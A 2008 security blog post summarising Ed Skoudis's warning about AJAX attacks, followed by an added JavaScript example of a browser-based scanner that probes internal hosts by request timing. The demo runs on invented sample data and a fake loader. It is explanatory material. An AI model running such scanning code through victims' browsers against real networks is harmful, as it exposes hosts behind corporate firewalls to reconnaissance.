Monday 5 May 2008

AJAX - an identified threat

In this article Ed Skoudis writes about the threats that come with Asynchronous JavaScript and XML (AJAX). The following passage is especially interesting:

"A script, running in the browser, can do anything you can do on that site: bid on an auction, buy stuff or expand your buddy list to include unsavory people... But it gets worse. The script could scrape your browser history... ..., and in turn forward the information back to the attacker. The script could also use the browser to start scanning other Web servers, perhaps even those inside of your corporation's firewall...


... So in a nutshell, an attacker can use the browser to wield bot-like control of a victim's machine. Sure, there are restrictions on what scripts can do in a browser. They can't directly access any file in the file system or run arbitrary programs on the machine, for example, but clever researchers are finding ways to either dodge those restrictions or live within them to achieve powerful controls."

Ed warns that this threat will grow and thinks it is worth keeping an eye on this trend. The full article.
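The "use the browser to start scanning other Web servers" point in the quoted passage is worth seeing in code. The block below is an added example, not code from Ed's article or from anyone he cites. A page script has no sockets, but it can make the browser request any URL, including addresses inside the corporate network, and observe whether and how fast the request settles; that alone separates hosts that answer HTTP from hosts that do not. The threshold, the fake loader and the sample timings are assumptions made for this illustration.

```javascript
// Added example (not from the article): the "browser as scanner" primitive.
// A script in a victim's browser cannot open raw sockets, but it can ask the
// browser to load any URL and observe whether, and how fast, the request
// settles. That is enough to tell a host that answers HTTP from one that does
// not, and the result can then be forwarded to the attacker like any other data.

const ALIVE_THRESHOLD_MS = 1000; // assumption: an answering host settles well under this

// Probe one URL with an injected loader. In a real page `load` would be
// `new Image()` with onload/onerror (a web server answering with HTML still
// fires onerror quickly) or fetch(url, { mode: 'no-cors' }); here it is a
// parameter so the scan logic can run outside a browser.
function probe(load, url, deadlineMs = ALIVE_THRESHOLD_MS) {
  const start = Date.now();
  let timer;
  const deadline = new Promise((resolve) => {
    timer = setTimeout(() => resolve(false), deadlineMs);
  });
  // Load success and load error both count as "settled": something answered.
  // Only hitting the deadline counts as no answer.
  const settled = load(url).then(() => true, () => true);
  return Promise.race([settled, deadline]).then((didSettle) => {
    clearTimeout(timer);
    return { url, settled: didSettle, ms: Date.now() - start };
  });
}

// Classify observations: a host that settled within the threshold is treated
// as a live web server; anything else as silent or filtered.
function classify(observations, thresholdMs = ALIVE_THRESHOLD_MS) {
  return observations.map((o) => ({
    url: o.url,
    alive: o.settled && o.ms < thresholdMs,
  }));
}

// Scan a list of hosts concurrently and return the classification, i.e. the
// report an attacker's script would send back out of the browser.
async function scanHosts(load, hosts, deadlineMs = ALIVE_THRESHOLD_MS) {
  const urls = hosts.map((h) => `http://${h}/`);
  const observations = await Promise.all(urls.map((u) => probe(load, u, deadlineMs)));
  return classify(observations, deadlineMs);
}

// Constructed sample observations, as a browser probe of four internal
// addresses might record them (addresses and timings invented for illustration).
const SAMPLE_OBSERVATIONS = [
  { url: 'http://10.0.0.1/',  settled: true,  ms: 35 },   // router admin page loads
  { url: 'http://10.0.0.7/',  settled: true,  ms: 60 },   // intranet server returns HTML: onerror, but fast
  { url: 'http://10.0.0.9/',  settled: false, ms: 1000 }, // nothing listening: hung until the deadline
  { url: 'http://10.0.0.50/', settled: false, ms: 1000 }, // filtered by a firewall: same picture as silent
];

// Constructed fake loader standing in for the browser: hosts in LIVE answer
// (by erroring, like a non-image response would) after a short delay, the
// rest never settle, so the deadline decides.
const LIVE = new Set(['http://10.0.0.1/', 'http://10.0.0.7/']);
function fakeLoad(url) {
  return new Promise((resolve, reject) => {
    if (LIVE.has(url)) setTimeout(() => reject(new Error('not an image')), 20);
  });
}

if (typeof require !== 'undefined' && require.main === module) {
  scanHosts(fakeLoad, ['10.0.0.1', '10.0.0.7', '10.0.0.9'], 200).then((r) => console.log(r));
}
```

The interesting design point is that success and failure callbacks are treated the same: a web server that refuses to serve an image still answers, and answers quickly, so only the absence of any answer before the deadline says "nobody home". The same timing trick is what makes the attack work from inside a browser that is not allowed to see the response at all.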
